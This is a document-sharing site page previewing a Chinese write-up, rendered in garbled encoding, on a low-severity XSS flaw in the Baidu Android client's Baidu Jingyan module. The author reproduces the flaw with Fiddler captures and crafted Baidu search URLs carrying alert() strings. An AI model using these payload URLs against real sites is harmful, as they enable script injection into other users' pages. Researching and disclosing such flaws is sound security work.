百度android客戶端百度經(jīng)驗(yàn)?zāi)K輸出內(nèi)容未過濾導(dǎo)致xss_第1頁
百度android客戶端百度經(jīng)驗(yàn)?zāi)K輸出內(nèi)容未過濾導(dǎo)致xss_第2頁
百度android客戶端百度經(jīng)驗(yàn)?zāi)K輸出內(nèi)容未過濾導(dǎo)致xss_第3頁
百度android客戶端百度經(jīng)驗(yàn)?zāi)K輸出內(nèi)容未過濾導(dǎo)致xss_第4頁
百度android客戶端百度經(jīng)驗(yàn)?zāi)K輸出內(nèi)容未過濾導(dǎo)致xss_第5頁
已閱讀5頁,還剩10頁未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

1、網(wǎng)上漏洞驗(yàn)證1)第一個(gè)payload 返回界面+第一個(gè)payload 返回界面:百度android 客戶端輸出內(nèi)容未過濾導(dǎo)致 xss漏洞點(diǎn)在在百度經(jīng)驗(yàn)?zāi)K,文章內(nèi)容為過濾評(píng)價(jià):低位,因?yàn)閿U(kuò)大攻擊范圍需要百度經(jīng)驗(yàn)發(fā)帖,同時(shí)首個(gè) xss 發(fā)現(xiàn)非我,分析漏洞發(fā)現(xiàn)者基礎(chǔ)上,進(jìn)一步發(fā)現(xiàn)新的 xss 觸發(fā)點(diǎn)。2018 年 11 月 26 日星期一在網(wǎng)上找到的百度 Xss-payload:1/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF& ms=12/from=844b/s?wo

2、rd=%E4%BF%AE%E6%94%B9alert%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86&sa=ts_1&ts=4352154&t_kt=0&ie=utf- 8&rsv_t=2715%252BTiab2gfmFre7D4LrEOc0XugajZp1NDgftJON9ulh2LOkP%252Fxj 5szLw&ms=1&rsv_pq=8150081601348093015&ss=100&tj=1&rq=alert%28%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&rqlang=zh&rsv_sug4=4145&oq

3、=alert%28%E 5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF漏洞分析+發(fā)現(xiàn)新的 xss 觸發(fā)點(diǎn):一1) View-source:/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&ms=12) 查看源碼,找到彈出的字符串:“你好,2017“二 復(fù)制出 url,并訪問以上地址全部來指向百度經(jīng)驗(yàn)的一篇文章:0/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%

4、40iphone 24_70.0/b 1&tj=travel2_4_0_10_l3&wd=&eqid=897e95ac4d9a6800100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKv jBQPf4-msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogig1/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l3

5、&wd=&eqid=897e95ac4d9a6800100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKvD7ix16xSlXgo5DsX msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogig2/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l4&wd=&eqid=897e95ac4d9a6800100000035b

6、fb5dfa&w_qd=IlPT2AEptyoA_yi9IE jBQPf4-msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogih rl-link-data-url=/album/29697b9173ce6dab23/from=844b/bd_page_type=1/ssid=0/uid=0/pu=usm%402%2Csz%40224_220%2Cta%40iphone 24_70.0/b 1&tj=travel2_4_0_10_l4&wd=&eqid=897e95ac4d9a6800

7、100000035bfb5dfa&w_qd=IlPT2AEptyoA_yi9IEKvD7ix16xSlXgo5DsX msj6q7Crgw3_kxsjSCBVbvto81dzGTTphogih點(diǎn)擊全文閱讀,跳轉(zhuǎn)到了這里:/article/29697b9173ce6dab21de3c5d.html在文中,找到了第一次彈的字符找到了第二次彈的字符發(fā)現(xiàn)是一篇 js alert 教程,此時(shí)想到 作者是如何進(jìn)一步利用的?一先查看文章中涉及的 xss 語句,源碼發(fā)現(xiàn)并未過濾,初步假設(shè):只要能訪問到本篇文章,點(diǎn)擊后就可以觸發(fā)二文章標(biāo)題出自百度經(jīng)驗(yàn)alert(彈

8、出消息對(duì)話框)的用法想到剛才搜索框先輸入 1/search?word=+搜索內(nèi)容構(gòu)造payload:一/search?word=alert(彈出消息對(duì)話框)的用法但發(fā)現(xiàn)百度用了模糊搜索search?word=需要找到百度不是模糊搜索,直接可以跳轉(zhuǎn)到此頁面,驗(yàn)證了之前的理論,點(diǎn)擊指定頁面,頁面中會(huì)包含此界面 id 值,只要文章標(biāo)題+id 值,應(yīng)該可以觸發(fā) xss抓到的包 url 解碼:/s?ie=utf- 8&f=8&rsv_bp=1&tn=baidu&wd=a

9、lert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86)%E7%9A%84%E7%94%A8%E6%B3%95&oq=alert(%25E5%25BC%25B9%2 5E5%2587%25BA%25E6%25B6%2588%25E6%2581%25AF%25E5%25AF%25B9%25E8%25AF%259D%25E6%25A1%2586)%25E7%259A%2584%25E7%2594%25A8%25E6%25B3%2595&rsv_pq=ac6e44ab00012e58&rsv_t=932eVtKEdFu

10、FLAxv9IoyaMKORMC2cFYeB3TUcMxjAKct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0很好” alert( “,為過濾,解析 url 編碼alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8%AF%9D%E6%A1%86)%E7%9A%84%E7%94%A8%E6%B3%95解碼后:2url 雙編碼如下是分析漏洞點(diǎn)的測試步驟,省略眾多測試截圖,因?yàn)槿渴?。Payload:/s?ie=utf-8&f=8&rsv_bp=1&tn=b

11、aidu&wd=alert( 彈出消息對(duì)話框)&oq=a alert(彈出消息對(duì)話框)&rsv_pq=ac6e44ab00012e58&rsv_t=932eVtKEdFuFLAxv9IoyaMKORMC2cFYeB3TUcMx jAKct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0拆分每個(gè)參數(shù),方便去掉多余參數(shù)漏洞復(fù)現(xiàn) Fiddler 開啟抓包,從百度首頁搜索 :alert(彈出消息對(duì)話框)的用法二/s?ie=utf-8&mod=1&isbd=1&isid=ABD3E7801A491595&ie=utf-8&

12、f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF%E5%AF%B9%E8% sv_sid=1427_25809_21100_26350_27509&_ss=1&clist=&hsug=&csor=17&pstg=2&_cr1=31751去掉:&oq=alert(彈出消息對(duì)話框) Payload:/s?ie=utf-8&f=8&rsv_bp=1&tn=baidu&wd=alert(彈出消息對(duì)話)&rsv_pq=ac6e44ab00012e58&rsv_

13、t=932eVtKEdFuFLAxv9IoyaMKORMC2cFYeB3TUcMxjA Kct%2BtZsaJu6p%2B%2F%2BcqU&rqlang=cn&rsv_enter=0訪問后未觸發(fā) xss此 url 的參數(shù)無法利用,繼續(xù)抓包/link?url=0ko1NVsDLCTL4xanS9o8YZGlEhBGWK_6te0ZBtY6cEJ9hFT8bhHg7XgkE6cQC_v訪問后會(huì)跳轉(zhuǎn)到:發(fā)現(xiàn)直接可以跳轉(zhuǎn)到此頁面,驗(yàn)證了之前的理論,點(diǎn)擊指定頁面,頁面中會(huì)包含此界構(gòu)造payload:一/link?wd= a

14、lert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF訪問返回:構(gòu)造失敗二剛才抓包時(shí),發(fā)現(xiàn) s 參數(shù)于是:url 拼接 link 改成 s/s?wd=alert(%E5%BC%B9%E5%87%BA%E6%B6%88%E6%81%AF&e游覽器模擬 andriodxss 觸發(fā)成功漏洞問題:Andriod 客戶端輸出頁面時(shí)內(nèi)容未過濾。漏洞挖掘總結(jié):1)從百度首頁搜索 標(biāo)題2)3)4)分析數(shù)據(jù)/link?url=an3YJzaNgkZVM6R7fUJrfbqe-5.構(gòu)造paylaod:htt

15、ps://s?wd=alert(彈出消息&eqid=b3b09c9c0000993b000000025bfba9d4游覽器模擬 andriod進(jìn)一步驗(yàn)證是標(biāo)題未過濾導(dǎo)致 xss 還是內(nèi)容未過濾導(dǎo)致 xss:在百度經(jīng)驗(yàn)找到了另一篇含有 xss 的代碼/article/90808022e075f5fd90c80f75.htmlsVNxvQOLkyChU_mIn5NSP9HJyaq4Sfnt2lUyfMaOheuUlHeDSiDc89X2ESQFoG2cKfbvb2uZ nk3j3B7DJS&wd=&eqid=b3b09c9c0000993b000000025bfba9d4標(biāo)題:雜談繞過 WAFWeb 應(yīng)用涉及的代碼:通過上面抓包修改參數(shù)模擬 android 測試后無法觸發(fā):/s?wd=%e6%9d%82%e8%b0%88%e7%bb%95%e8%bf%87WAFWeb%e5%ba%94%e7%94%a8%e9%98%b2%e7%81%ab%e5%a2%99&eqid=d6786e2800011f1f000000025bfbad12會(huì)重新跳轉(zhuǎn)到如下界面:驗(yàn)證結(jié)論:分析后發(fā)現(xiàn)還是需要標(biāo)題中帶有英文字母比如alert, 才能進(jìn)到指定頁面,進(jìn)一步觸發(fā)頁面中的

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論